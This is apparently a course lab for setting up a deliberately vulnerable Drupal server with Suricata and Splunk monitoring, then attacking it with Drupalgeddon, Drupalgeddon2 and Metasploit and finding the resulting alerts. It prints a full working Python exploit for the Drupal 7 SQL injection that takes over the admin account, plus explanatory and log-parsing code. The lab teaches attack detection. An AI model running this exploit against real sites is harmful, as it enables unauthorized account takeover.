IR 202: Metasploit & Drupalgeddon (30 pts + 55 extra)


What You Need for This Project

Purpose

Practice using Google Cloud, Suricata, Splunk, Metasploit, and custom exploits in Python and Ruby.

Task 1: Creating a Debian Cloud Server

If you made a Google Cloud Debian server previously, use that.

If you did not, follow these instructions:

ED 200: Google Cloud Linux Server


Task 2: Creating a Drupal Cloud Server

Creating an Image

First, you need to create a disk image from my public image, which is stored on the Google Cloud.

In Google Cloud Platform, on the left side, click "Compute Engine", Images, as shown below.

At the top center of the next page, click "CREATE IMAGE", as shown below.

As shown below, create an image using a Source of "Cloud Storage file" and a Cloud Storage file of:

gs://sams-images/purple1.tar.gz
Click Create. This took 5 minutes when I did it.

When the process finishes, your image appears in the Images list, as shown below.

Creating the Drupal Target Server

At the top left, click "VM instances".

In the top center, click "CREATE INSTANCE".

In the "Boot disk" section, click the Change button, as shown below.

In the "Boot disk" box, on the "Custom images" tab, select purple1, as shown below.

Click Select.

In the Firewall section, allow both HTTP and HTTPS traffic, as shown below.

Click Create.

When your server is created, it appears in the "VM instances" list, as shown below.

Testing Drupal

Find the "External IP" of your target server, as shown in the image above.

In a Web browser, open this URL, replacing the IP address with the correct address of your target server.

http://35.236.41.106
You should see a Drupal page, as shown below. It may take a few minutes for the server to boot up.

Starting Splunk

In the "VM instances" list, on the right side, on the line for your target server, click SSH to open a Terminal.

In the Terminal, execute this command to start Splunk:

sudo /opt/splunk/bin/splunk start
Splunk starts, as shown below.

Starting Suricata

On your Drupal target server, execute these commands:
sudo service suricata stop
sudo rm /var/run/suricata.pid
sudo suricata -D -c /etc/suricata/suricata.yaml -i ens4

Testing Splunk

In a Web browser, open this URL, replacing the IP address with the correct address of your target server.

Note that this page uses port 443, but it does NOT use HTTPS: type http:// explicitly, because a browser that upgrades the URL to https:// will fail to connect. The Splunk credentials therefore cross the network in cleartext, which is one more reason to restrict the firewall in Task 3.

http://35.236.41.106:443
You see the Splunk login page, as shown below.

Log in with these credentials:

If you see a message saying your license has expired, log out, log in again, and choose the "Free" license.

You see the Splunk home page, as shown below.

Testing Connectivity

In the "VM instances" list, on the right side, on the line for your Debian attack server, click SSH to open a Terminal.

In the Terminal, execute this command, replacing the IP address with the IP address of your target Drupal server:

ping -c 2 35.236.41.106
You should see replies, as shown below.

Sending Suspicious Traffic

In the "VM instances" list, on the right side, on the line for your Debian attack server, click SSH to open a Terminal.

In the Terminal, execute this command, replacing the IP address with the IP address of your target Drupal server:

curl -A "Hentai" 35.236.41.106
The source code for the main Web page loads, beginning with the HTML code shown below, and scrolling down for a few screens.

Viewing the Suricata Alert in Splunk

In your Splunk page, at the top left, click splunk>

On the left side, click "Search & Reporting".

In the lower center, click the "Data Summary" button.

In the "Data Summary" box, click the Sources tab. Several source files appear, as shown below.

In the "filter" box, enter sur

Several Suricata files appear, as shown below.

Click /var/log/suricata/fast.log.

You see an alert containing "Hentai", as shown below.


Flag IR 202.2: "Hentai" Alert (15 pts)

The flag is the text covered by a green box in the image above. Enter that flag into the scoring engine to record your success.

Task 3: Protecting Your Server

The vulnerable Drupal server will get hacked before long by automated attacks.

To prevent that, we'll configure the Google Cloud firewall to restrict access to only trusted IP addresses.

Finding your Public IP Address

In Google, search for

whats my ip

Your public IP appears, as shown below.

Make a note of it.

Adjusting the Firewall

In the Google Cloud Platform page, in the line for your Drupal server, on the right side, click the three-dot icon, and click "View network details", as shown below.

On the next page, on the left side, click "Firewall rules".

In the list of rules, click default-allow-http, as shown below.

In the "Firewall rule details" page, at the top center, click EDIT.

Adjust the Source IP range so it contains only the IP of your Debian attack server and the public IP of your own computer (one address per entry, each as a /32; remove the 0.0.0.0/0 entry), as shown below.

At the bottom of the page, click Save.


Flag IR 202.3: Firewall Rule (5 pts)

The flag is the text covered by a green box in the image above. Enter that flag into the scoring engine to record your success.

Task 4: Drupalgeddon Attack

On your Debian attack server, execute this command:
nano dru
Paste in the code shown below. It is the Python 2 exploit from this page, ported to Python 3 so it runs with the python3 that Debian ships: https://github.com/kenorb/drupageddon/blob/master/drupal_7.x_sql_injection_sa-core-2014-005.py
#!/usr/bin/env python3
# Drupal 7.x SQL Injection Example for SA-CORE-2014-005 https://www.drupal.org/SA-CORE-2014-005
# Original: http://pastebin.com/nDwLFV3v
# Creditz to https://www.reddit.com/user/fyukyuk
#
# Please use it only for testing purposes.
#
# Ported from Python 2 to Python 3 for this project: urllib2 -> urllib.request,
# print statements -> print(), and the POST body is sent as bytes.

import sys
import urllib.error
import urllib.request
from drupalpass import DrupalHash  # https://github.com/cvangysel/gitexd-drupalorg/blob/master/drupalorg/drupalpass.py

if len(sys.argv) != 4:
    print("host username password")
    print("http://example.com/ admin new_pass")
    sys.exit(1)
host = sys.argv[1]
user = sys.argv[2]
password = sys.argv[3]

# Hash the new password with the cost and salt of an existing Drupal 7 "$S$"
# hash; Drupal stores only the first 55 characters of the result.
new_hash = DrupalHash("$S$CTo9G7Lx28rzCfpn4WB2hUlknDKv6QTqHaf82WLbhPT2K5TzKzML", password).get_hash()

target = '%s/?q=node&destination=node' % host

# The payload is the array KEY of the name[] field. Drupal 7.31 and earlier turn
# that key into a placeholder name and splice it into the SQL unescaped, so the
# UPDATE rewrites uid 1's name and password hash; the "#" comments out the rest.
post_data = "name[0%20;update+users+set+name%3d\'" \
            + user \
            + "'+,+pass+%3d+'" \
            + new_hash[:55] \
            + "'+where+uid+%3d+\'1\';;#%20%20]=bob&name[0]=larry&pass=lol&form_build_id=&form_id=user_login_block&op=Log+in"
print("POST: ", post_data)

content = ''
try:
    content = urllib.request.urlopen(url=target, data=post_data.encode()).read().decode('utf-8', 'replace')
except urllib.error.HTTPError as err:
    print('HTTP Error:', err.code)

# The original author keys success off this PHP warning, raised when name[]
# reaches the login form as an array. It is not a reliable indicator (see the
# FIXME), so confirm by logging in with the new credentials.
if "mb_strlen() expects parameter 1" in content:
    # FIXME: On 6.8 it's showing success, despite it's not.
    print("Success!\nLogin now with user:%s and pass:%s" % (user, password))
else:
    print("Not success!\n")

Save the file with Ctrl+X, Y, Enter.

On your Debian attack server, execute this command:

nano drupalpass.py
Paste in the code shown below. It is the Drupal password hashing helper from this page, ported to Python 3 in the same way (hashlib needs bytes, and indexing bytes already yields integers, so the ord() calls are gone): https://github.com/cvangysel/gitexd-drupalorg/blob/master/drupalorg/drupalpass.py
import hashlib

# Calculate a non-truncated Drupal 7 compatible password hash.
# The consumer of these hashes must truncate correctly (Drupal keeps 55 chars).
# Ported from Python 2 to Python 3 for this project.

class DrupalHash:

  def __init__(self, stored_hash, password):
    self.itoa64 = './0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz'
    self.last_hash = self.rehash(stored_hash, password)

  def get_hash(self):
    return self.last_hash

  def password_get_count_log2(self, setting):
    # The 4th character of the setting encodes log2 of the iteration count.
    return self.itoa64.index(setting[3])

  def password_crypt(self, algo, password, setting):
    setting = setting[0:12]  # "$S$" + cost character + 8-character salt
    if setting[0] != '$' or setting[2] != '$':
      return False

    count_log2 = self.password_get_count_log2(setting)
    salt = setting[4:12]
    if len(salt) < 8:
      return False
    count = 1 << count_log2

    if algo == 'md5':
      hash_func = hashlib.md5
    elif algo == 'sha512':
      hash_func = hashlib.sha512
    else:
      return False
    pw = password.encode()
    # Same construction as Drupal's _password_crypt(): hash(salt . password),
    # then "count" rounds of hash(previous . password).
    hash_str = hash_func(salt.encode() + pw).digest()
    for c in range(count):
      hash_str = hash_func(hash_str + pw).digest()
    output = setting + self.custom64(hash_str)
    return output

  def custom64(self, string, count = 0):
    # Drupal's own base64 variant (_password_base64_encode), not RFC 4648.
    # "string" is the raw digest (bytes), so string[i] is already an int.
    if count == 0:
      count = len(string)
    output = ''
    i = 0
    itoa64 = self.itoa64
    while 1:
      value = string[i]
      i += 1
      output += itoa64[value & 0x3f]
      if i < count:
        value |= string[i] << 8
      output += itoa64[(value >> 6) & 0x3f]
      if i >= count:
        break
      i += 1
      if i < count:
        value |= string[i] << 16
      output += itoa64[(value >> 12) & 0x3f]
      if i >= count:
        break
      i += 1
      output += itoa64[(value >> 18) & 0x3f]
      if i >= count:
        break
    return output

  def rehash(self, stored_hash, password):
    # Drupal 6 compatibility: a bare 32-character MD5 hex digest
    if len(stored_hash) == 32 and stored_hash.find('$') == -1:
      return hashlib.md5(password.encode()).hexdigest()
    # Drupal 7: a "U$" prefix marks a Drupal 6 MD5 hash that was re-hashed on upgrade
    if stored_hash[0:2] == 'U$':
      stored_hash = stored_hash[1:]
      password = hashlib.md5(password.encode()).hexdigest()
    hash_type = stored_hash[0:3]
    if hash_type == '$S$':
      hash_str = self.password_crypt('sha512', password, stored_hash)
    elif hash_type == '$H$' or hash_type == '$P$':
      hash_str = self.password_crypt('md5', password, stored_hash)
    else:
      hash_str = False
    return hash_str

Save the file with Ctrl+X, Y, Enter. On your Debian attack server, execute this command to make "dru" executable:

chmod a+x dru
Run it with the three arguments its usage message lists: the target URL (http:// followed by your target's IP), the account name to write into uid 1, and the new password. Send some attacks to your target server, as shown below. Because the script's success check is unreliable (see its FIXME), confirm the injection by logging in to Drupal with the new credentials.
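To see why the array key in that POST body ends up as SQL, here is a Python model of the bug and of its fix, added for this project; it is not code from the exploit above or from Drupal. It re-implements the relevant lines of Drupal 7's DatabaseConnection::expandArguments() with the pre-7.32 behaviour beside the 7.32 fix, and builds the request array the way PHP does from the body the dru script sends. The query text and the :name placeholder are simplified stand-ins for the login lookup (the real placeholder is :db_condition_placeholder_0), and HASH stands in for the 55-character password hash:

```python
import re
from urllib.parse import unquote_plus


def php_post_array(body):
    """Minimal model of how PHP builds $_POST from "field[key]=value" pairs
    (one level of brackets is all the login form needs)."""
    post = {}
    for pair in body.split("&"):
        key, _, value = pair.partition("=")
        key, value = unquote_plus(key), unquote_plus(value)
        m = re.fullmatch(r"(\w+)\[(.*)\]", key)
        if m:
            post.setdefault(m.group(1), {})[m.group(2)] = value
        else:
            post[key] = value
    return post


def expand_arguments(query, args, hardened=False):
    """Model of DatabaseConnection::expandArguments() (Drupal 7,
    includes/database/database.inc), simplified for this example.

    A placeholder bound to an array, e.g. "name IN (:name)", is expanded into
    one placeholder per element. Up to 7.31 the new placeholder names were
    built from the array's KEYS, which for the login form come straight from
    the request, so a key such as "0 ;update users set ..." lands in the SQL
    text unescaped. hardened=True applies the 7.32 fix: iterate over
    array_values(), so only 0, 1, 2 ... ever reach the query.
    """
    args = dict(args)
    for key, data in [(k, v) for k, v in args.items() if isinstance(v, dict)]:
        items = enumerate(data.values()) if hardened else data.items()
        new_keys = {"%s_%s" % (key, i): value for i, value in items}
        # PHP: preg_replace('#' . $key . '\b#', implode(', ', array_keys($new_keys)), $query)
        query = re.sub(re.escape(key) + r"\b", lambda _: ", ".join(new_keys), query)
        del args[key]
        args.update(new_keys)
    return query, args


# The body the dru script sends, with user=admin and HASH in place of the real
# hash (constructed for this example; no server is contacted).
POST_BODY = ("name[0%20;update+users+set+name%3d'admin'+,+pass+%3d+'HASH'"
             "+where+uid+%3d+'1';;#%20%20]=bob&name[0]=larry&pass=lol"
             "&form_build_id=&form_id=user_login_block&op=Log+in")

# Stand-in for the lookup user_load_by_name() runs; the mechanics are the same.
LOGIN_QUERY = "SELECT * FROM users WHERE name IN (:name)"


def build_login_query(body, hardened=False):
    """Return (query, bound_args) for the given POST body, as 7.31 or 7.32 would."""
    args = {":name": php_post_array(body)["name"]}
    return expand_arguments(LOGIN_QUERY, args, hardened)


if __name__ == "__main__":
    for hardened in (False, True):
        q, a = build_login_query(POST_BODY, hardened)
        print("hardened=%s\n  %s\n  %s" % (hardened, q, a))
```

Run it with python3 and compare the two queries: the vulnerable expansion carries the attacker's UPDATE inside the IN (...) list, with the rest of the statement commented out by "#", while the hardened one contains only :name_0 and :name_1 and binds bob and larry as ordinary values.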

Detecting the Attack

In Splunk, find the Suricata alert shown below.
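Splunk does the parsing for you in this task and in the "Hentai" alert of Task 2; if you want to work with fast.log directly, or check what Splunk shows against the file on disk, the following Python parser, added here and not part of the original project, reads Suricata fast.log records (Suricata 4.x layout, IPv4 only) into dicts and answers the two questions both tasks ask: which alerts came from the attack server, and which alert messages mention a given string such as "Hentai". The sample lines are constructed for the example with local rule SIDs (1000001 and up) and made-up addresses; they are not alerts from the purple1 image's ruleset:

```python
import re
from collections import Counter

# fast.log record layout (Suricata 4.x):
#   TIMESTAMP  [**] [GID:SID:REV] MSG [**] [Classification: C] [Priority: N] {PROTO} SRC:SPORT -> DST:DPORT
# The Classification block is optional and ICMP records carry no ports.
FAST_LOG_RE = re.compile(
    r"^(?P<ts>\S+)\s+\[\*\*\]\s+"
    r"\[(?P<gid>\d+):(?P<sid>\d+):(?P<rev>\d+)\]\s+"
    r"(?P<msg>.*?)\s+\[\*\*\]\s+"
    r"(?:\[Classification:\s+(?P<classification>[^\]]*)\]\s+)?"
    r"\[Priority:\s+(?P<priority>\d+)\]\s+"
    r"\{(?P<proto>[A-Za-z0-9]+)\}\s+"
    r"(?P<src>\d{1,3}(?:\.\d{1,3}){3})(?::(?P<sport>\d+))?\s+->\s+"
    r"(?P<dst>\d{1,3}(?:\.\d{1,3}){3})(?::(?P<dport>\d+))?\s*$"
)

# Constructed sample; local SIDs and addresses invented for this example.
SAMPLE_FAST_LOG = """\
04/13/2019-19:41:02.113485  [**] [1:1000001:1] LOCAL POLICY HTTP User-Agent Hentai [**] [Classification: Potential Corporate Privacy Violation] [Priority: 1] {TCP} 35.236.55.190:39874 -> 10.138.0.2:80
04/13/2019-19:42:10.004211  [**] [1:1000002:1] LOCAL WEB_SERVER Drupal 7 SQLi SA-CORE-2014-005 login form [**] [Classification: Web Application Attack] [Priority: 1] {TCP} 35.236.55.190:39902 -> 10.138.0.2:80
04/13/2019-19:40:31.500001  [**] [1:1000003:1] LOCAL ICMP echo request [**] [Priority: 3] {ICMP} 35.236.55.190 -> 10.138.0.2
this line is not a fast.log record and is skipped
"""


def parse_fast_log(lines):
    """Parse fast.log lines into dicts; lines that do not match are skipped."""
    records = []
    for line in lines:
        m = FAST_LOG_RE.match(line.strip())
        if not m:
            continue
        rec = m.groupdict()
        for k in ("gid", "sid", "rev", "priority"):
            rec[k] = int(rec[k])
        for k in ("sport", "dport"):
            rec[k] = int(rec[k]) if rec[k] is not None else None
        records.append(rec)
    return records


def alerts_from(records, src_ip):
    """Alerts whose source is the given address (e.g. the attack server)."""
    return [r for r in records if r["src"] == src_ip]


def alerts_matching(records, needle):
    """Case-insensitive substring match on the rule message, like a free-text Splunk search."""
    return [r for r in records if needle.lower() in r["msg"].lower()]


def top_signatures(records):
    """(sid, msg) pairs by count, most frequent first."""
    return Counter((r["sid"], r["msg"]) for r in records).most_common()


if __name__ == "__main__":
    recs = parse_fast_log(SAMPLE_FAST_LOG.splitlines())
    for r in alerts_matching(recs, "hentai"):
        print(r["ts"], r["sid"], r["msg"], r["src"], "->", r["dst"], r["dport"])
    for (sid, msg), n in top_signatures(recs):
        print(n, sid, msg)
```

Point it at /var/log/suricata/fast.log on the target (parse_fast_log(open(path))) and filter with alerts_from() on the attack server's external IP; after Task 3, any alert from a different source on port 80 is traffic your firewall rule should not be letting through.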


Flag IR 202.4: Drupalgeddon Alert (10 pts)

The flag is the text covered by a green box in the image above. Enter that flag into the scoring engine to record your success.

Task 5: Drupalgeddon 2 Attack (20 pts extra)

On your Debian attack server, use this attack to exploit your target:

https://github.com/dreadlocked/Drupalgeddon2

You will have to install Ruby and resolve a missing dependency: the script needs the highline gem.

Attack your target server, as shown below.


Flag IR 202.5: Drupalgeddon 2 Alert (20 pts)

The flag is the text covered by a green box in the image below.


Task 6: Resizing your Disk (5 pts extra)

To add more Splunk modules, we'll need a larger hard disk.

On the purple1 machine, in an SSH session, execute these commands to see the current disk space and begin a proper shutdown:

df -h
sudo halt

If it's taking too long, which it did for me, force a shutdown (Stop) from the "VM instances" page.

In Google Cloud Platform, on the left side, click "Compute Engine", Disks.

Click on the purple1 disk, and then, at the top, on EDIT.

Change the disk size from 10 to 20 GB, as shown below. A persistent disk can only be grown, never shrunk, so do not overshoot.


Flag IR 202.6: Disk Type (5 pts)

The flag is the text covered by a green box in the image above. Enter that flag into the scoring engine to record your success.

Restarting your Server

In Google Cloud Platform, start the purple1 server.

Run the df -h command and verify that the disk has more space, as shown below.

Restarting Suricata and Splunk

Restart Suricata and Splunk with the same commands you used in Task 2 ("Starting Splunk" and "Starting Suricata"); neither is started automatically at boot on this image.

Task 7: Adding Splunk Stream (10 pts extra)

Go here:

https://splunkbase.splunk.com/app/1809/

Log in to a Splunk account. Download the splunk-stream_712.tgz file.

At the top left of Splunk, click "splunk>"

At the top left, click the gear icon. The Apps page opens, as shown below.

At the top right, click "Install app from file".

Click "Choose File" and browse to the splunk-stream_712.tgz file.

Click Upload.

After a few minutes, you are prompted to restart Splunk. Do that.

Now Splunk has stream data, as shown below.


Flag IR 202.7: Splunk Stream (10 pts extra)

The flag is the text covered by a green box in the image above. Enter that flag into the scoring engine to record your success.

Task 8: Installing Metasploit (10 pts extra)

Install Metasploit on your Debian attack server, as explained here:

https://computingforgeeks.com/how-to-install-metasploit-framework-on-ubuntu-18-04-debian-9/

Execute these commands to start Metasploit and search for drupal attacks:

msfconsole
search drupal
Drupalgeddon and drupalgeddon2 are both available, as shown below.


Flag IR 202.8: Metasploit (10 pts extra)

The flag is the text covered by a green box in the image above. Enter that flag into the scoring engine to record your success.

Task 9: Drupalgeddon via Metasploit (10 pts extra)

Use Metasploit to perform a Drupalgeddon attack, as shown below.

In the meterpreter session, execute these commands:

shell
curl http://ad.samsclass.info
In Splunk, search for
ad.samsclass.info
as shown below.


Flag IR 202.9: Source (10 pts extra)

The flag is the text covered by a green box in the image above. Enter that flag into the scoring engine to record your success.

Posted 4-13-19
Switched to Sam's scoring engine 4-14-19
Scoring engine removed for WCIL 5-20-19
Flag labels improved 8-8-19
Search term for task 7 corrected to "drupal" 8-8-19
Free Splunk license process added 8-8-19
Adapted for CCSF use 8-19-19